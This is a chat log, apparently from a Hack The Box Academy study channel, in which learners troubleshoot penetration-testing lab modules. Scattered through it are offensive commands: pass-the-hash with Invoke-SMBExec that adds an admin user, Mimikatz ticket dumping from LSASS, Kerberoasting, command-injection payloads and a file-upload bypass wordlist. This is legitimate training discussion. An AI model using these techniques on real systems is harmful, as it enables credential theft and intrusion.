#modules
Leet. Didn't know nmap would capture the traffic as well... I'll have to try that on the next box I do
Nmap doesn't capture traffic
You just need to capture the traffic during an nmap scan
you can do packet traces
but also HOLY SHIT IS THIS EXPLOIT PISSING ME OFF... a file in the same directory works, while another doesn't
like WTF
what are the module time estimations based on? they feel so short compared to my learning speed, and a path like "SOC Analyst Prerequisites" that estimates 12 days could take me up to a couple months
It could be the way I'm taking notes and memorizing this info which is why I came to ask, what do you guys find helps you remember more of what you read in an efficient manner?
writing down key concepts, doing the module exercises and writing the steps to get the solution
everyone's different though
if you have to rewrite entire sections in your own words, so be it
IIRC the time estimate for the modules is mostly for companies to get an idea of how much time they should expect their employees to take
you should worry more about if you're understanding the content than how long you take to finish the modules though
hello
Is there something wrong with this module? I think there is a problem when he constructs ptunnel-ng.
try the response to this: https://discordapp.com/channels/473760315293696010/774040263278592041/1157004303983198249
Need a quick sanity check on the file upload module whitelist/blacklist content. If I'm understanding this correctly, there's two places where an Insecure File Upload could take place; at the web application itself, or through a server misconfiguration. If the web application itself can be tricked into accepting and running your malicious file, game over. However, if the web application doesn't accept the file but the web server does, the attacker would still have to locate and execute that code. Does that sound right?
Can I please DM anyone about the SQLmap Assessment?
are you asking about client-side validation vs server-side validation? in any case, code execution always needs to happen on the server for you to get a shell
🤔 I think I need to go back and re-read some stuff before I ask my question.
Thanks it's very useful, I learned to search history
Is this on your machine or ParrotOS?
Can I please DM anyone about the SQLmap Assessment? I would really appreciate it ... I already got the answer before but I am reviewing and I need help getting it again ...
If anyone is having trouble uploading computers.json data from sharphound use SharpHound v1.0.2
open|filtered If we do not get a response for a specific port, Nmap will set it to that state. This indicates that a firewall or packet filter may protect the port.
I just used the ones that's on C:\tools
Why is there no content at all?
Wrap the search in quotes
Sometimes egrep is dumb
Also the location of wordlists may have changed in the pwnbox update
Make sure /usr/share/wordlists exists
Also try adding * to /usr/share/wordlists
Such that /usr/share/wordlists/*
Ik -r is recursive
But it could be behaving weirdly
¯\_(ツ)_/¯
yes,you are right
For getting started knowledge check, I got to the last step of getting root but then had to do a little googling because it was a different process than what the content covered. Did I miss something where it was explained how ||php|| could be used to escalate?
Gtfobins link
It's in one of the sections
While it wasn't explicitly covered, the resources were provided to you
It also creates something that is not needed
¯\_(ツ)_/¯
It's looking for lines that start with transf
So it may be the sed command that's a bit fucked
Got it, thanks that's what I found on google. Was focusing on the cheat sheet too much and didn't realize ALL links in the content were in play
They generally are useful
Am I doing something wrong here with Hashcat?
This is the cmd I used to grab the hash
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user SAPService > sapservice
verify the format and compare it to the expected one
try --force or hashcat in your own VM, not attack01
Tried --force, will try in own VM.
Is there anyone that has finished the Advanced SQL injections module?
force the system to like the files you transfer
https://academy.hackthebox.com/module/113/section/2154 Why did it go wrong?
Can someone guide me how to do Intro to Assembly Language- on windows, every part of this module req to download a file. but what programs to use or how? ty in advance for any guidance.
you tried to make a breakpoint on the function name: b *SQL... ?
i didn't do the module but personally i would have done it that way
I am in the NTLM Relay attacks module, Ntlmrelayx Use cases section, and I had a doubt: why does smbexec work but psexec does not? I am able to get the flag but still I don't understand. Aren't they the same, except smbexec executes functions one by one whereas psexec spawns an interactive shell?
try without the * : b SQL..
did you load the debugging symbols?
It's OK if you don't add @
nice
Question regarding the Password Attacks module, Windows Lateral movement section, Pass the Hash with PowerShell Invoke-TheHash (Windows).
It says
Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.
And it shows two ways. One way is to create a new admin user and add it to the local administrators group, which of course requires admin privs as the author mentioned.
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
The second way they show is to get a reverse shell
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "<rev shell command>" -Verbose
Question is, do you need the hash for an account with admin rights for the reverse shell too, or only for creating a new user and adding it to the local admins group ?
so I haven't done this module but it's similar to the course provided in the cpts. psexec creates a remote service with a name Remcomsvc in the $admin share, then the service is registered via rpc using windows service control manager so I think your user peter doesn't have write access on the $admin share. Unlike smbexec, which doesn't install a service, SMBExec doesn't need to deposit a binary on the target machine or create a service, which makes it useful when write access to ADMIN$ is restricted.
what's the module link?
But this user is an admin on that computer so he should have access to ADMIN$
maybe it's the svc manager that's blocking it, since some anti-virus programs see the RemComSvc executable as a threat.
no, the error says authenticated as guest, aborting so idt thats it
also i checked there is no AV installed
ah so yes guest doesn't have access to the $ADMIN share, that's good to know. i looked on google they say the service is usually blocked when it's created, so that's why i said that
Pls sir can you help me with the correct input syntax I got the answer but it’s not accepting the ans
Hello can anyone help me in DMs about the SQLmap Skill assessment
Check your DMs
No :)
Is it normal for Telnet to just hang and time out on the labs? Because that's what it's about.
You generally shouldn't be connecting with telnet
Especially if secure services are involved you'd use openssl
Pls I need help with answer format to this question in Detecting DCSync/DCShadow of DETECTING WINDOWS ATTACKS WITH SPLUNK
Modify the last Splunk search in this section by replacing the two hidden characters (XX) to align the results with those shown in the screenshot. Enter the correct characters as your answer.
I have gotten the two characters but it's not accepting it. I thought that the answer format is XX. Pls I need help from those who have finished CDSA
What sucks about ||IMAP|| is how painfully slow it is to respond.
It's not slow
It's your connection
Also be sure to connect securely
If you suspect a lab isn't behaving properly; restart it
Or change vpn regions and restart it
Tried both. The instant I try to log in as ||tom|| the whole service immediately freezes up.
It shouldn't
Module: Attacking Common Services
Section: Attacking Email Services
I tried smtp-user-enum standalone script with the provided users.list from resources and w/ all methods (VRFY, EXPN and RCPT) for the target.
I got nothing in return.
smtp-user-enum -M <method> -U /path/to/users.list -D inlanefreight.htb -t <target ip> -w 20
Is there something wrong with the syntax?
Okay, workaround. In order to log in I had to ssh -Y into my PwnBox and killall -9 python3 to stop all that outbound traffic which for whatever reason was interfering with the connection.
¯\_(ツ)_/¯
I don't mess w/pwnbox much
Better just to use your host directly?
can i get explanation for this question from the pivoting module?
What IP address is used on the attack host to ensure the handler is listening on all IP addresses assigned to the host? (Format: x.x.x.x)
i didnt get what it is asking for
Remote/Reverse Port Forwarding with SSH section
I use my own vm
It's a basic answer
Think of when you do nc -lvnp 8000
What address shows up
I mean what part didn't you understand?
Localhost is one of the ip addresses assigned
But if you're listening on localhost you aren't necessarily listening on other interfaces
what is the difference between 0.0.0.0 and 127.0.0.1?
0.0.0.0 is a wildcard, if you're listening on 0.0.0.0:22, for instance, any device that shares a network with that device can connect to it on that port
127.0.0.1 is exclusively calls coming from inside the house (itself)
You can open a port on 127.0.0.1 and, without port forwarding, no matter how hard you try you won't be able to reach that port from the outside
is there a way to dump the kerberos keys with Rubeus, similar to mimikatz sekurlsa::ekeys? So far I have not found a way to do it
ohhh
yes sir
how ?
Rubeus.exe dump /nowrap
it gives it in base64
yes, and when I try to decode it, it's just gibberish
oh you mean keys not tickets
yes
yeah, I could not find any command to extract the keys with rubeus, I know you can get them with mimikatz, but I was wondering if it's possible with rubeus
Mimikatz can perform the same base64 .kirbi extraction with the following series of commands:
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # standard::base64 /output:true
mimikatz # kerberos::list /export
Mimikatz can also carve tickets directly out of LSASS' memory with:
mimikatz # privilege::debug
mimikatz # standard::base64 /output:true
mimikatz # sekurlsa::tickets /export
As "everything is stealthy until someone is looking for it", it's arguable whether LSASS manipulation or ticket extraction via the LsaCallAuthenticationPackage() API call is more "stealthy". Due to Mimikatz' popularity, opening up a handle to LSASS and reading/writing its memory has become a big target for EDR detection and/or prevention. However, LsaCallAuthenticationPackage() is used by a fairly limited set of processes, and creating a fake logon application with LsaRegisterLogonProcess() is also fairly anomalous behavior. However full API level introspection and baselining appears to be a more difficult technical problem than LSASS protection.
that explains it very well, much appreciated
Literally from the documentation
Ctrl+f "keys"
so basically this is impossible then
Well ekeys isn't necessary for that
i mean u can just dump the tickets
^
i mean, if you want to do Overpass The Hash, you cannot only rely on Rubeus
Just doing what's explained in the section
you have to dump the ekeys first with mimikatz
yeah PTT you can rely on Rubeus completely, for Overpass the Hash you need to somehow get the ekeys first
yes
There should be a technique shown in the section
sorry, a technique for what dumping the ekeys with rubeus ?
You're focusing too hard on ekeys
I only meant to underline that if you want to do PTT you can just use one tool, but if you want to do Overpass-the-Hash, you can do it all with mimikatz, or combine it with Rubeus. It's true the exercise at the end only asks you to perform PTT, but the authors always encourage the students to go beyond
ekeys wasn't mentioned in the section at all, even
from the PTT from windows section
Even still. You can do it with just Rubeus
not for overpass-the-hash
in this module i should execute the reverse shell by connecting to it with the creds in the previous module right?
I believe creds are given to you, no?
i don't know who made the new API module (haven't really checked, am doing it currently) but i gotta hand it to him, it's really well made. like really well made
Like the new web fuzz module?
i think i already did that module
the previous modules i did felt more like copy what i did, recreate it to get the flag etc etc.. this module shows you an example and lets you figure it out by yourself in a different instance, if i explained it well
account X has this vulnerability in a certain field then they let u have other credentials to investigate on your own and find the vulnerability by yourself not too far away from the example given. in the section
Yeah. I enjoy the modules where the example differs just enough from the practical
i gotta say its really good, and props for pedant on making the module that way
I thought the same thing 😭
Might as well stay on mimikatz atp
Yeah for the exam for sure, rather keep it simple. Using Rubeus maybe only for evasion which is not the case here. I was looking into ways to dump LSASS remotely and found lsassy tool, not covered in CPTS, but apparently covered in crackmap exec module.
Yeah
Lsadump can do it as well iirc or one of the tools you use to locally dump the sam/system hives
You just use a user/ip
I can't find the best forum for this question, but this is the closest I could find. Does anyone know if the billing section of the academy web app allows one time payments? I have purchased cubes in the past and it seems like I can only pay with my PayPal or add a card to PayPal. Did anyone subscribe with a one time payment without saving the card to the account?
Reach out to support, but afaik your card gets saved, you can reach out to support to unlink your card
I reached out to support, unfortunately the chat bot says I would get an answer by e-mail in a few hours.
Then nothing you can do about it, as the people that ultimately know how billing works are them
Maybe I am wrong, but they show how to dump NTDS.dit, SAM,LSA Secrets remotely, but they do not show how to dump LSASS from memory remotely in any of the modules
Gimme a sec to find it, but iirc it's the pypykatz minidump local
yes, but before you use pypykatz, they show how to create an LSASS dump *locally*
But it may also have been something I read extra about
But if you look into the lsadump tool used for SAM/SYSTEM dump, there should be a way to do remote
As you have to specify that it's local in the command
hmmm could be, it's the secretsdump.py that they show for SAM dump, once you generated and transferred them
That's what it is
Secretsdump allows for remote dumping with valid [admin] credentials
yeah for sam, ntds.dit, not lsass memory dump
idk what to tell you chief ¯\_(ツ)_/¯
Hi, I tried writing on general but it sends me here, what do I do?
Hello I need help with the Command Injections Module (Bypassing).
Nothing works. Not even ip=127.0.0.1%0a{lsa}
Has anyone ever seen THIS happen before?
@shut wraith Which section are you on, friend?
I'm on Bypassing Space Filters of Command Injections
@shut wraith gimme a minute. I'm going to check the module and my notes here.
Mind if I DM you?
Hey all! I'm working through Web Proxies > Repeating Requests. I'm at the point where I just need to find the second flag by trying different requests.
The issue I'm having is when i enter ip=;ls; this works fine but any other request I get a 400 bad request response. Like when I try this ip=;ls ..; I get 400 bad request
If someone could point me in the right direction that would be awesome!
well ls .. isn't gonna execute
try ls ../
or ls /
Thanks @fathom pendant but same issue for both
did you try not having the ; at the end? it's been a hot minute since i touched that
Yup! When I try ip=;ls; it takes a couple seconds and comes back with the correct response. If I try ip=;ls ../; or ip=;ls /; it comes back immediately saying 400 bad request
try respawning the target and recapturing the request
It could be related to the quotes you used, there is a single quote and a double. It seems to just ignore the special character signaling where to fuzz.
edit: sorry i was mistaken about the single quote, it is just your red rectangle hiding the second one.
ok found the issue but not sure what is wrong. Had the same issue but when I updated the original request to update my input of 1 to ;ls; to instead change it to ;ls /; this worked.
When changing it via Open/Resent within zap this worked.
When changing the request with the zap HUD it doesn't want to work with replay in console, but it does work with replay in browser.
i'm stuck on IMAP/POP3 footprinting cannot find credentials to access servers, can anybody help me?
I can help you in a few minutes if someone else isn't available sooner. What have you tried? My DM's are open if you'd prefer that avenue.
thanks, i DMd you
I'm in the Windows Priv Esc module in the Situational Awareness section, and I couldn't help but wonder how it's possible that Test-AppLockerPolicy says i am denied cmd.exe, yet i am running that application. Can someone help me understand this?
Im guessing that it has something to go with another group policy, but idrk
@fathom pendant can I PM you about the cross-site scripting phishing section? I think I have the payload, but am stuck trying to clean it up. I followed the module
I feel like there's waaay too much yapping in the Penetration Testing Process module, same things are repeated hundreds of times
maybe things are interconnected afterall
Of course they are, but repeated too many times imo
Is this normal?
you're running powershell though?
fair point😂
i suppose the screenshot doesnt help, but i was also able to run commands in cmd.exe
im writing a report using the template from SysReptor and there is this section "Internal Network Compromise Walkthrough". do i write how i managed to get initial foothold to host A and then talk about how i went from host A to host B in the detailed walkthrough, or what exactly? it seems ambiguous to me
quick question about some nmap stuff. how long, on average, does it take you guys to do a -p- scan on a target? i feel like no matter what settings i use it gets to about 30% on the scan, then the host starts dropping the probes and nmap increases the sending delay to 1000ms and above. the scan ETA also increases due to this. this only happens when running a -p- scan. is there a flag i can use to decrease this time? really don't want to sit here for 10 minutes for one section page.
Yes, you write everything
I assume you're writing a report based off AEN?
yes
-T4
my go to is sudo nmap -sC -sV -v -p- <target>
i get to the point after it discovers all open ports, then the delay goes through the roof
ill try -T4...
As a note for this it runs a full scan on all ports, then a script scan on all ports, then a version scan on all ports
yeah that's typically the information i want
i have more than one domain in the active directory so i write how i got initial foothold and moved my way to DC all in two sections, one with high level steps and one with a detailed walkthrough with pictures and stuff
right?
.
do the -Pn, -n, and --disable-arp-ping speed things up at all?
Not really
id send an image if i could... i get the whole "discovered open port" list then just a whole slew of "increasing send delay" messages due to either "max_successful_tryno increase" or "11 out of 11 dropped probes"
At least not to a significant degree
is it kinda one of the things where i just have to suck it up and wait 10 minutes haha
Do a regular port scan that generates a list. Then use that list to do the version and script scans against
alr ill try that
is that correct or i missed something else?
I am unsure why it is doing this, despite following the module
following to the dot in the exercise will not always help you
enumerate the application a bit, take notes and use what you've been taught in the section
adapt and overcome
Can anyone point me into the right direction or tell me how I can locate a file using LFI (local file inclusion)?
looks like whatever you did broke some part of the html code. Might be worth investigating.
Locate a file
It's a lot of guessing tbh
Like with the /…/…/
web applications shouldn't normally do that.
It just depends on what you're looking for
that's file traversal. if that vulnerability is present that's certainly one way of finding it.
Iirc one of the modules goes over file inclusions
@glass quail root directory
/flag.txt
@fathom pendant correct: https://academy.hackthebox.com/module/details/23
I tried that one, i wasn't able to read it
The question should tell you where it's at basically
First try your payload against /etc/passwd
I did
And did that load?
the question just says Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.
Oh
yes correctly
I figured it out
hacking wordpress
And if it's a vulnerable plugin, then it's one of the WordPress plug-ins, and files that exists already
Perhaps it's not flag.txt
What section?
test assessment
I thought I had to use a wordpress plug-in to get LFI
ok thanks
ooooooh
Can anyone help me with the nmap hard lab please?
Make sure you check your source
alright... I need to take a break.
Thank you 
It's more about the big scans, as I wanted to make sure I'm doing what it's asking
The lfi is another question 
It shouldn't be "big" scans
But ig idk what you mean by big
All ports is correct
So it takes about an hour is that how it's meant to be done?
Reread the ids/ips section, and think about "source"
It shouldn't take an hour. Likely you triggered the ids/ips and you're getting blocked
Can I send you my command
No
The command structure is given in the reading
I'm telling you what section it will be in the reading
Read that whole page and try the different methods
Replacing specific ports [-p] with -p-
So i understand what you're getting at but it doesn't appear to be working, I am doing -p- but it doesn't return the ports expected
or it takes an hour
Getting NXDOMAIN when attempting to ||dig 134.209.24.248 PTR|| — is there something missing here? And if ||dig|| returns multiple domains, what else can be used to narrow things down?
Module: Information Gathering - Web Edition
Section: Digging DNS
Reset the target, change vpn regions
Also
Ensure you can reach the internet
If you can't reach the internet, you ain't gonna find shit
The problem is too much information, not too little. Dig query is returning 2 domain names, an authority section, and no answer section.
Try dig -x
I can't tell if it's bugged or I am completely missing something, it starts me on 50/75 alerts too
Yes, it starts at 50. Also, don't refresh the page — each time you do, the counter increases, as I learned the hard way.
Yeah
That's normal
But if you do it right you barely touch the alerts
Stealth is key for this and setting a source also helps
Yup. Think about what port is impossible to block without screwing up ||everyone's ability to access the Internet.||
That's not necessarily true
Can someone help me with the last module "assets" on the API attacks?
no, sorry, I hadn't found the list of words
Hi guys, I'm just starting the 'Password attacks lab - medium' on the pentester job path and the walkthrough says to start with smbmap. Whenever I run smbmap it comes back with nothing. I can nmap and ping the target just fine, I can't work out what I'm missing. Anyone got an idea?
hey does wpscan have the chance of giving different vulnerabilities on different scans because I can't find the unauthorized file download.
when you type smbmap is it installed
yeah, it runs and connects, it just finds nothing
I haven't messed with smbmap maybe try a different walkthrough without the smbmap
Smbmap isn't required, just normal enumeration
Enumerate everything you find :)
hello everyone, for the skill assessment of web attacks i'm stuck. i managed to find the id of the administrator, so i modified it in the cookie, then i try to reset the password and i get access denied, and i don't see how to make an xxe, there is no xml field
if anyone has any clues, i'd love to hear them. i was able to analyze the request during the reset, and i tried different http methods to bypass the access denied, but nothing. i'm taking missing parameters.
Tamper with some verbs
Also did you find the t*
There's another element sent with the password reset
yes T_n when I reset the password, I can get it with a get from the api with the uid ending in 2 (I delete the message afterwards) but that's where I get stuck, I get a missing parameters, I don't know why, should I reset to the htb-student uid and enter the admin T_n when I reset... but I don't see the point since I don't need the admin token to reset his password
I'm going to try all the http methods again, I think I've tried them all.
If you have admin t* you can reset admin password
- tries to enumerate discord*
with the uid 74 ?
With the admin uid
well I'd like to lol but it says access denied when in the cookie I have the uid corresponding to admin
And the admin t*
And did you try different verbs? :)
There's several points to consider when resetting, think about all the different places you need
Look where it's requesting
Can I send you a private message to see if you have the same token in your notes, please?
No
It's not hard to GET the token
You can even write a basic script for it
no but the token I saw that I have the admin cookie was just to see if I'm not mistaken
You're not gonna get any new cookies
Just UID and token are the important things here
Pay attention to endpoints as well
But you're close if you know those 2 things
ok I'll try to see with what you told me
Hey guys how are you doin?
I have been trying the Getting Started for CPTS. I type Bob's password in but I'm not able to go further, setup keeps failing. I don't know if I'm doing it wrong
Need help
write section name and what you've tried in detail
^
Service Scanning
I’ve tried
smbclient -U bob \\10.129.226.128\users
Password: bob:Welcome1
I get session setup failed
@late shell
because his password isn't bob:Welcome1
Oh
whenever that's a credential combination; username:password
whenever you see credentials written out, it'll generally be in the format of user:pass
also don't randomly @ people
they are asking for help regarding something different than you
and much like you, they are also very much a beginner in this field
Sorry, I @'d the wrong person😑 it was a mistake. I'll know next time. Is this explained in the section? How would I know this?
Thank you
it's general convention
you are told the username is bob; and you see in the reading bob:Welcome1
well if bob is the username, and most passwords don't allow for : when you set them
i need some help with "Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer." in the footprinting module. got the hash of DBSNMP, but it doesn't work, tried to remove :, tried to add the username, tried to crack the hash and put the password, but none works..
Hi, i am having issues with one of the CBBH modules, if somebody could help me out, that would be much appreciated!
I am learning the "File Upload Attacks" and when I try to follow the "Whitelist Filters" exercise, I don't get the response that I should get which makes me think that something is broken in that target.
Can somebody try and let me know if it is me or the module that is doing something wrong?
this one
If you want a sanity check, you can share the value with me and I'll tell you if it just needs more jiggling. DM's are open.
Share in dms or do an md5sum of the pw
You won't get the same response size as the example, if that's what you're wondering
that's not what I mean
the exercise says .jpg.php should work, but that is not the case over here
Don't expect the example to mirror the practical
normally it always does?
in this module, the examples offer a simplified version, but provides all the information needed to check and arrive at the answer on your own
ok, then I will try and look for another solution now that I know it's not the machine but me 🙂
thank you
https://academy.hackthebox.com/achievement/221679/17
Thank you for the help was a fun one
a good habit to break out of this mindset is assume the module wouldn't just flat out give you the answer
yes I know, I am trying different things now but the intruder in burpsuite without pro is so slow
it shouldn't take more than like 1 minute to go through
2 big indicators (as shown) is the response size, and the response itself
i have 1760 words and it takes very long for burp to handle the fuzzing 🙂
hi I think I found an issue. I found the right exploit built for tomcat admins and ran it and it will not let me log into server and get shell. I am doing it with metasploit. This is for assessment for shells and payloads. the assessment section is the second to last section. I set the right username and password and now I run exploit. The target must be vulnerable and I set the right port number for the exploit (8080).
msf6 payload(windows/x64/meterpreter_bind_tcp) > search port 8080
Matching Modules
================
   #  Name                                                   Disclosure Date  Rank       Check  Description
   -  ----                                                   ---------------  ----       -----  -----------
   0  exploit/windows/http/hp_imc_java_deserialize           2017-10-03       excellent  Yes    HP Intelligent Management Java Deserialization RCE
   1  exploit/windows/scada/iconics_genbroker                2011-03-21       good       No     Iconics GENESIS32 Integer Overflow Version 9.21.201.01
   2  auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                    normal     No     Jenkins Server Broadcast Enumeration
   3  auxiliary/scanner/misc/poisonivy_control_scanner                        normal     No     Poison Ivy Command and Control Scanner
   4  exploit/windows/http/solarwinds_fsm_userlogin          2015-03-13       excellent  Yes    Solarwinds Firewall Security Manager 6.6.5 Client Session Handling Vulnerability
   5  auxiliary/admin/http/tomcat_administration                              normal     No     Tomcat Administration Tool Default Access
   6  exploit/linux/http/trendmicro_websecurity_exec         2020-06-10       excellent  Yes    Trend Micro Web Security (Virtual Appliance) Remote Code Execution
   7  auxiliary/scanner/http/wildfly_traversal               2014-10-22       normal     No     WildFly Directory Traversal
Interact with a module by name or index. For example info 7, use 7 or use auxiliary/scanner/http/wildfly_traversal
msf6 payload(windows/x64/meterpreter_bind_tcp) > use 5
msf6 auxiliary(admin/http/tomcat_administration) > show options
Module options (auxiliary/admin/http/tomcat_administration):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        8180             yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host
msf6 auxiliary(admin/http/tomcat_administration) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(admin/http/tomcat_administration) > set RHOSTS 172.16.1.11
RHOSTS => 172.16.1.11
msf6 auxiliary(admin/http/tomcat_administration) > set TOMCAT_PASS s3cret
TOMCAT_PASS => s3cret
msf6 auxiliary(admin/http/tomcat_administration) > set TOMCAT_USER tomcat
TOMCAT_USER => tomcat
sounds like you're using the wrong list then bud
```
msf6 auxiliary(admin/http/tomcat_administration) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_administration) > exploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/tomcat_administration) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
i don't recall the php ext list being that long
it runs but does not give a reverse shell
use the php list that the module links :) it saves a lot of headache
just following what the exercise says haha:
"Exercise: Try to add more PHP extensions to the above script to generate more filename permutations, then fuzz the upload functionality with the generated wordlist to see which of the generated file names can be uploaded, and which may execute PHP code after being uploaded."
ah yeah its silly
but iirc the premade list works just fine
bc 1760 words with non-pro intruder takes a while
probably like 30 minutes
yes indeed
if you want you can maybe try the wordlist yourself and see what the issue is for me? 🙂
also did you make it with all the different php extensions? or just one extension at a time?
:)
if I set VHOSTS what do I make the RHOSTS?
RHOST = IP; VHOST = fqdn such as support.hackthebox.com
I am doing the fuzzing with this wordlist:
```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\' '.' '…' ':'; do
    for ext in '.php' '.phps' '.php2' '.php3' '.php4' '.php5' '.php6' '.php7' '.pht' '.phtml' '.phar'; do
        for ext2 in '.jpg' '.jpeg' '.png' '.gif'; do
            echo "shell$char$ext$ext2" >> wordlist.txt
            echo "shell$ext$char$ext2" >> wordlist.txt
            echo "shell$ext2$char$ext" >> wordlist.txt
            echo "shell$ext2$ext$char" >> wordlist.txt
        done
    done
done
```
yeah that'll do it
don't do a large list
just do a handful of extensions
ok, i'll remove some and see what it does
also as a word to the wise; get in the habit of bracketing your variables
${char}${ext}${ext2}
ok, i'm still learning and this is what the academy gave me 🙂
it ensures that bash only reads the var as that, and not some extra stuff
ik what it gave you
and this is what i'm telling you
cool, thx for the tip!
that way in the future if you decide to do something like $var_filename
var=foo
it won't say foo_filename
because it treats the whole thing as the var
what's wrong with options here?
```
msf6 auxiliary(admin/http/tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       status.inlanefreight.local  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        8080                        yes       The target port (TCP)
   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
   THREADS      1                           yes       The number of concurrent threads (max one per host)
   TOMCAT_PASS  s3cret                      no        The password for the specified username
   TOMCAT_USER  tomcat                      no        The username to authenticate as
   VHOST        172.16.1.11                 no        HTTP server virtual host
```
I know there is something misconfigured here
${var}_filename
shells and payload module? that doesn't look to be the right user and pass
I thought it was because when I go to the website at 172.16.1.11:8080 and try to log in then login fails and I hit cancel it shows a page that lists those creds
should I try without any username and password?
this is for question 2
shells and payloads yeah?
ya the assessment section
look at the desktop of the jump host you're given 😄
ok
its something like 90% of people overlook (including myself) LOL
literally super easy to not think about
but it was there the whole time
I was doing http verb wrong and changing it manually instead of using the burp option
because the creds on the jump host desktop do work
let burp do the hard work for you
yes
second question did you set the LHOST to the right interface
I swear lol😭 🤣
hold on let me check
there's no LHOST option in this exploit
but the port is set to 8080 and originally the exploit used 8180
RPORT I mean
am I using wrong exploit?
VHOST is set to target VHOST
¯\_(ツ)_/¯
though i don't recall using msfconsole for tomcat stuff
i just used msfvenom for the payload and set up a listener
it was way easier
it'll be easier than trying to figure out and troubleshoot msfconsole
ok thanks I will start work on it tonight
I gotta go now but ya I will get to work on that
I'm gonna take a break for now then
ya that would explain why what I'm doing isn't working
anyway I gotta go
I'll ttyl next time I need help
I ought to try it right way before I immediately ask for help so I will review msfvenom
anyway peace out
this is getting me nowhere 😓
don't use the scripted extensions, just use the basic php list provided it contains some double extensions in it as well
i did that in the beginning of the exercise, there I only got a valid upload message with these:
but they are not running any PHP
these are only just uploading simple .jpg, .png and .gif files with filename x00
you should be getting more
gimme a moment
that's what i've been saying, i thought i would get .php.jpg also, but it seems that its not the case for me
yes i know
where I would like to get "File successfully uploaded", I am getting "Extension not allowed"
did you disable the url encoding?
yes
when you found the .php.jpg did you replace the whole thing with the payload selection or just the .php
:) i suggest only looking for the replacement for ||.php||
what do you mean? i don't follow sorry
have your payload only ||replace the .php part of .php.jpg||
and use the php list from the PayloadAllTheThings repo
this is my payload in burpsuite, if you mean that?
```http
------WebKitFormBoundaryLpXa6RzSZUdAW0Hk
Content-Disposition: form-data; name="uploadFile"; filename="shell§.png§"
Content-Type: image/png

<?php echo 'hello world'; ?>
------WebKitFormBoundaryLpXa6RzSZUdAW0Hk--
```
i am replacing ".png"
Quick Question: When you ssh to a target, and it asks for you password, are you using the password that's in the "my_credentials.txt" file? Because in the Linux Fundamentals course, in small print, it says,
"SSH to with user "htb-student" and password "HTB_@cademy_stdnt!"
You need a ||double extension that works first||
Or at least that gives a different error
i believe that file contains the credentials for your pwnbox instance
The mycredentials is for your pwnbox if you wish to ssh into it from another machine
like this one? #modules message
okay. Because when I use the "HTB_@cademy_stdnt!" password, it says, "Permission denied, please try again." Weird.
ssh htb-student@ip
Only images allowed from what I recall
For section PKI-ESC 1 in windows attack & defense module whenever I try to authenticate to the box with logs, PKI (172.16.18.15) I get this^
Can you try to ssh to it?
yeah but it's just stagnant
Rdp might not be enabled for that machine
You mean slow or freezes?
Have you tried using the tcp vpn
I've been on pwnbox so far so I haven't tried tcp vpn, I don't know if slow or freezes I ran it again to make sure I didn't kill the command prematurely
From what I've heard sometimes it's just slow
Other alternatives include changing vpn region (yes it can matter)
Upon ssh I got connection timed out
And changing pwnbox region
i honestly think this exercise is broken
nothing is working for me
i give up for today and will try again later i guess...
thanks for trying to help though @fathom pendant and @storm elk 👋
Nah, not broke
Create the XOR ciphertext of the password 'opens3same' using the key 'academy'. (Answer format: \x00\x00\x00....) I have the answer I think, but I'm not sure how to format it. Can anyone help?
use cyberchef website
Cool. Thank you
👍
it's asking to be formatted in hex notation
\xAF will tell most programs that the following digits are in hex notation
so any backend binary/math is done using that
ok cool. I was not sure how to format it but i will try the hex notation. Thank you
I got it. I was over thinking it thinking they wanted me to include the key with it.
congrats
Cracking passwords with hashcat module
💯
I forgot to cancel subscription and now it will renew in 14th sept.
If I will cancel it now, will I have access to modules until 14th sept or it will also cancel it?
you will have access still
thanks
wait
no it says 100 cubes now....
I guess I just lost 8 bucks

@dim wolfand what should I do now?
contact support
great thanks 
Had to use that many times while NCL was going on — good thing we're using it again here.
ssh: connect to host 10.129.6.125 port 22: No route to host
any ideas? Im connected to an eu vpn, new file as well. i have port 22 open on my vm as well.
reload target
Though when I do try and ping the target, I get this:
PING 10.129.6.125 (10.129.6.125) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
From 10.10.16.1 icmp_seq=2 Destination Host Unreachable
Try switching VPN from UDP to TCP or vice versa.
you don't need ssh open on your system to be able to ssh to the target
dest: host unreachable -- is your vpn on, and are you using the right one
do u have pwnbox open at the same time?
i had that happen to me
“SSH open”, are you referring to the client service?
My vpn is on, I’m using a eu vpn
i mean you don't need to have ssh running on your machine
and you're using the academy vpn yeah?
:)
turn the target off, hard refresh the page (ctrl+shift+r), restart the target and try again. if that doesn't work, disconnect from the vpn, re-download the ovpn file again with the server/region of your choice, and perform the previous steps i mentioned. that should do it, if not maybe reboot your vm or host machine and try the steps again.
Mhm
